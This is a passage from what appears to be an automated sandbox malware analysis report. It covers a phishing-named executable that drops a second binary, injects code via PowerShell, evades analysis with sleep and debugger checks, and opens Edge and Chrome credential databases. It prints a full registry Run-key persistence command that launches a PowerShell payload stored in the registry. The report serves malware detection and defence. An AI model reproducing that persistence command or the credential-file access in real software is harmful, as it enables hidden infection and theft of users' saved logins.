            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeAPI/Special instruction interceptor: Address: 204B125
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,12_2_0040DD85
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7277Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2475Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeWindow / User API: threadDelayed 2425Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeWindow / User API: threadDelayed 7562Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeAPI coverage: 4.3 %
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeAPI coverage: 9.9 %
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5428Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe TID: 4480Thread sleep count: 2425 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe TID: 4480Thread sleep time: -7275000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe TID: 4480Thread sleep count: 7562 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe TID: 4480Thread sleep time: -22686000s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeCode function: 0_2_0040635D FindFirstFileW,FindClose,0_2_0040635D
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeCode function: 0_2_0040580B GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040580B
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 5_2_0040635D FindFirstFileW,FindClose,5_2_0040635D
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 5_2_0040580B GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_0040580B
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 5_2_004027FB FindFirstFileW,5_2_004027FB
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 5_2_1F2310F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_1F2310F1
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 5_2_1F236580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,5_2_1F236580
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_0040AE51 FindFirstFileW,FindNextFileW,12_2_0040AE51
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 13_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407EF8
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407898
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_00418981 memset,GetSystemInfo,12_2_00418981
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: lftebevgelserne.exe, 00000005.00000002.3960470900.0000000002867000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW7
            Source: lftebevgelserne.exe, 00000005.00000002.3960470900.0000000002838000.00000004.00000020.00020000.00000000.sdmp, lftebevgelserne.exe, 00000005.00000002.3960470900.0000000002867000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeAPI call chain: ExitProcess graph end nodegraph_0-3526
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeAPI call chain: ExitProcess graph end nodegraph_0-3523
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeAPI call chain: ExitProcess graph end nodegraph_13-34111
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 5_2_00405648 CreateDirectoryW,GetLastError,GetLastError,LdrInitializeThunk,SetFileSecurityW,GetLastError,5_2_00405648
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 5_2_1F232639 IsProcessorFeaturePresent,LdrInitializeThunk,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_1F232639
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,12_2_0040DD85
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 12_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,12_2_004044A4
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 5_2_1F234AB4 mov eax, dword ptr fs:[00000030h]5_2_1F234AB4
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 5_2_1F23724E GetProcessHeap,5_2_1F23724E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 5_2_1F232B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_1F232B1C
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 5_2_1F232639 IsProcessorFeaturePresent,LdrInitializeThunk,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_1F232639
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 5_2_1F2360E2 LdrInitializeThunk,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_1F2360E2

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe base: 1710000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe "C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Wende% -windowstyle 1 $Pertline=(gp -Path 'HKCU:\Software\Platanus\').Grundtankerne;%Wende% ($Pertline)"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeProcess created: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe /stext "C:\Users\user\AppData\Local\Temp\lmkhnkgtxjjxcrnotizi"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeProcess created: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe /stext "C:\Users\user\AppData\Local\Temp\ngpzfdrvkrbkmxjsctukugj"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeProcess created: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe /stext "C:\Users\user\AppData\Local\Temp\xivkgncoyztpolxwtdgdfsekyz"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Wende% -windowstyle 1 $Pertline=(gp -Path 'HKCU:\Software\Platanus\').Grundtankerne;%Wende% ($Pertline)"Jump to behavior
            Source: lftebevgelserne.exe, 00000005.00000002.3961568160.0000000002893000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerLN
            Source: lftebevgelserne.exe, 00000005.00000002.3961568160.0000000002893000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: lftebevgelserne.exe, 00000005.00000002.3961568160.0000000002893000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerFN
            Source: lftebevgelserne.exe, 00000005.00000002.3961568160.0000000002893000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManageryN
            Source: lftebevgelserne.exe, 00000005.00000002.3960470900.0000000002818000.00000004.00000020.00020000.00000000.sdmp, lftebevgelserne.exe, 00000005.00000002.3960470900.000000000287A000.00000004.00000020.00020000.00000000.sdmp, lftebevgelserne.exe, 00000005.00000002.3960470900.0000000002867000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
            Source: lftebevgelserne.exe, 00000005.00000002.3961568160.0000000002893000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager2N
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 5_2_1F232933 cpuid 5_2_1F232933
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 5_2_1F232264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_1F232264
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: 13_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,13_2_004082CD
            Source: C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exeCode function: 0_2_0040326A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040326A
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000005.00000002.3960470900.000000000287A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3960470900.0000000002858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3960470900.0000000002867000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: lftebevgelserne.exe PID: 5744, type: MEMORYSTR
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
